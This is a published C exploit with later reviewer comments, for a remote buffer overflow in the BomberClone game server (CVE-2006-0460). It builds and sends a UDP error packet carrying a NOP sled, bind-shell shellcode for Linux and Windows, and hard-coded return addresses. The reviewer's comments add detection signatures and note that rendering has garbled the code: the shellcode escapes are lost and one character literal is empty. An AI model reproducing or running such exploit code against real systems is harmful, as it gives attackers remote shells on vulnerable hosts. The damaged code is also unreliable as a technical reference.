
# Title : BomberClone < 0.11.6.2 (Error Messages) Remote Buffer Overflow Exploit
# Published : 2006-03-22
# Author : esca zoo


/*
 * bomberclone < 0.11.6.2 remote exploit
 * CVE-2006-0460
 * 3/14/06
 * escazoo@yahoo.com
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* fork() + bind() port 31337 - ty izik */
/*
 * Payload staged into pkg_error.text by main() for the default (non-"win32")
 * target. Per the author's note it is a forking bind shell on TCP 31337, so
 * the host-side indicator for this payload is the game process (or a child
 * of it) holding an unexpected listening socket on that port.
 *
 * NOTE(review): the bytes are printed as "x6a" rather than a "\x" escape;
 * the backslashes appear to have been lost when the page was rendered, so
 * as shown this array is plain ASCII text, not machine code, and its
 * strlen() (which main() uses for placement) no longer reflects the
 * original payload length. Left as-is.
 */
char linux_shellcode[]= 
"x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcdx80"              
"x5bx5dx52x66xbdx69x7ax0fxcdx09xddx55x6ax10x51"                  
"x50x89xe1xb0x66xcdx80xb3x04xb0x66xcdx80x5fx50"                  
"x50x57x89xe1x43xb0x66xcdx80x93xb0x02xcdx80x85xc0"             
"x75x1ax59xb0x3fxcdx80x49x79xf9xb0x0bx68x2fx2fx73"
"x68x68x2fx62x69x6ex89xe3x52x53xebxb2x6ax06x58"                 
"xcdx80xb3x04xebxc9";            

/* bind shell to 4444 - metasploit */
/*
 * Payload used when argv[3] is "win32". Per the author's note it is a
 * Metasploit bind shell listening on TCP 4444; an unexpected listener on
 * that port owned by the game process is the matching host indicator.
 * Because main() sizes the copy with strlen(), the payload must not
 * contain a 0x00 byte anywhere -- a terminating NUL would truncate it.
 *
 * NOTE(review): as with the other payload, the "\x" escape prefixes have
 * been lost in rendering; as printed this is ASCII text, not code.
 */
char win32_shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x36"
"xbcx74xb1x83xebxfcxe2xf4xcaxd6x9fxfcxdex45x8bx4e"
"xc9xdcxffxddx12x98xffxf4x0ax37x08xb4x4exbdx9bx3a"
"x79xa4xffxeex16xbdx9fxf8xbdx88xffxb0xd8x8dxb4x28"
"x9ax38xb4xc5x31x7dxbexbcx37x7ex9fx45x0dxe8x50x99"
"x43x59xffxeex12xbdx9fxd7xbdxb0x3fx3ax69xa0x75x5a"
"x35x90xffx38x5ax98x68xd0xf5x8dxafxd5xbdxffx44x3a"
"x76xb0xffxc1x2ax11xffxf1x3exe2x1cx3fx78xb2x98xe1"
"xc9x6ax12xe2x50xd4x47x83x5excbx07x83x69xe8x8bx61"
"x5ex77x99x4dx0dxecx8bx67x69x35x91xd7xb7x51x7cxb3"
"x63xd6x76x4exe6xd4xadxb8xc3x11x23x4exe0xefx27xe2"
"x65xefx37xe2x75xefx8bx61x50xd4x65xedx50xefxfdx50"
"xa3xd4xd0xabx46x7bx23x4exe0xd6x64xe0x63x43xa4xd9"
"x92x11x5ax58x61x43xa2xe2x63x43xa4xd9xd3xf5xf2xf8"
"x61x43xa2xe1x62xe8x21x4exe6x2fx1cx56x4fx7ax0dxe6"
"xc9x6ax21x4exe6xdax1exd5x50xd4x17xdcxbfx59x1exe1"
"x6fx95xb8x38xd1xd6x30x38xd4x8dxb4x42x9cx42x36x9c"
"xc8xfex58x22xbbxc6x4cx1ax9dx17x1cxc3xc8x0fx62x4e"
"x43xf8x8bx67x6dxebx26xe0x67xedx1exb0x67xedx21xe0"
"xc9x6cx1cx1cxefxb9xbaxe2xc9x6ax1ex4exc9x8bx8bx61"
"xbdxebx88x32xf2xd8x8bx67x64x43xa4xd9xd9x72x94xd1"
"x65x43xa2x4exe6xbcx74xb1";

/*
 * Common packet header as this exploit models it: two single-byte fields
 * followed by two 16-bit fields, 6 bytes with no padding. main() sets typ
 * and flags to 0 and stores the total packet size in led; id is never
 * written and stays at its zero initial value. What typ/flags/id mean to
 * the receiver is not established here -- presumably typ selects the
 * message kind and 0 is the error-text message -- TODO confirm against
 * the game's protocol source.
 */
struct pkgheader {
 unsigned char typ;    /* message type; 0 in the packet built below */
 unsigned char flags;  /* 0 in the packet built below */
 signed short id; 
 signed short led;     /* receives sizeof(struct pkg_error) */
} pkgheader;           /* also defines a file-scope object that nothing here uses */

/*
 * The "error message" packet this program sends: the 6-byte header, one
 * error-number byte, then an 816-byte text body (text starts at offset 7;
 * sizeof is 824 once padded to the struct's 2-byte alignment). The
 * overflow the title refers to is presumably in how the receiver handles
 * this text field -- TODO confirm in the vulnerable version's source.
 *
 * As built by main(), text is 0x90 filler with a payload ending at offset
 * 700 and one 4-byte return address repeated from offset 732 to the end.
 * For detection: a UDP datagram of this size with typ == 0 whose text is
 * dominated by a long run of 0x90 bytes and a repeated 4-byte pattern at
 * the tail is the network-level signature of this exploit; the original
 * fix was to upgrade to 0.11.6.2 or later, per the title.
 */
struct pkg_error {
 struct pkgheader h;
 unsigned char nr;     /* set to 'A' by main() */
 char text[816];       /* sled + payload + repeated return address */
} pkg_error;           /* the one instance main() fills and sends */

/*
 * Builds one pkg_error packet and sends it as a single UDP datagram to the
 * address and port given on the command line.
 *
 * argv[1]  target IPv4 address; parsed with inet_addr(), so a malformed
 *          address silently becomes INADDR_NONE rather than an error
 * argv[2]  target UDP port; atoi(), no range check
 * argv[3]  "win32" selects the second payload/return-address pair, any
 *          other value the first. The usage string shows it as optional
 *          but the argc check below requires it.
 *
 * Returns 0 once the datagram is handed to the kernel, -2 on a usage
 * error, -1 if socket/connect/send fails (reason printed via perror).
 *
 * text body layout as built here (offsets into pkg_error.text):
 *   0 .. 700-len     0x90 filler (x86 NOP)
 *   701-len .. 700   payload, right-aligned to end at offset 700
 *   701 .. 731       0x90 filler
 *   732 .. 815       the chosen return address, repeated
 * Both return addresses are hard-coded absolute constants, so the packet
 * only matches the exact builds/memory layouts the author was targeting.
 */
int main(int argc, char *argv[]) {
 char *ptr;
 int sockfd, i;
 long *addrptr, ret;
 struct sockaddr_in vict;
 
 if(argc < 4) {
  /* NOTE(review): the rendering appears to have dropped a backslash
   * here (a bare "n" where a newline escape is expected) and in the
   * '' literal further down, which is an empty character constant and
   * does not compile. Both left untouched. */
  fprintf(stderr, "%s IP Port [target]n", argv[0]);
  return -2;
 }

 
 /* Start from an all-0x90 body; everything else is overlaid on it. */
 memset(pkg_error.text, 0x90, sizeof(pkg_error.text));
 if(!strcmp(argv[3], "win32")) {
  ret = 0x77dab1da;
  /* Payload placed so its last byte lands at text[700]. strlen() is the
   * length, so the payload must contain no 0x00 byte. */
  memcpy(pkg_error.text + 701 - strlen(win32_shellcode), win32_shellcode, strlen(win32_shellcode));
 }
 else {
  ret = 0xbffff164;
  memcpy(pkg_error.text + 701 - strlen(linux_shellcode), linux_shellcode, strlen(linux_shellcode));
 }
 
 pkg_error.h.typ = 0; 
 pkg_error.h.flags = 0;
 /* led carries the whole struct size; h.id is never set and stays 0
  * because pkg_error has static storage. */
 pkg_error.h.led = sizeof(struct pkg_error);
 pkg_error.nr = 'A';

 /* Fill text[732..815] with the return address.
  * NOTE(review): i advances by 4 per step but each store writes
  * sizeof(long) bytes. The code assumes a 32-bit long; on an LP64 host
  * the 21 stores cover 168 bytes and run past the end of text, which is
  * undefined behaviour. text + 732 also sits at an odd offset from the
  * start of the struct (7 + 732), so the long stores are misaligned --
  * tolerated on x86, UB in principle. The signed/unsigned comparison in
  * the loop condition is harmless here because i is always positive. */
 ptr = pkg_error.text + 732;
 addrptr = (long *)ptr;  
 for(i = 732; i < sizeof(pkg_error.text); i+=4)
  *(addrptr++) = ret;

 vict.sin_family = PF_INET;
 vict.sin_port = htons(atoi(argv[2]));
 vict.sin_addr.s_addr = inet_addr(argv[1]);
 memset(&(vict.sin_zero), '', 8);

 /* UDP socket: connect() only records the peer address, no handshake
  * happens, so a closed port is not detected here and send() normally
  * succeeds regardless of whether anything is listening. */
 if((sockfd = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 if(connect(sockfd, (struct sockaddr *)&vict,
 sizeof(vict)) < 0) {
  perror("connect");
  return -1;
 }

 /* The whole struct, header included, is the datagram payload. */
 if(send(sockfd, &pkg_error, sizeof(pkg_error), 0) < 0) {
  perror("send");
  return -1;
 }
 
 close(sockfd); 

 return 0;
}
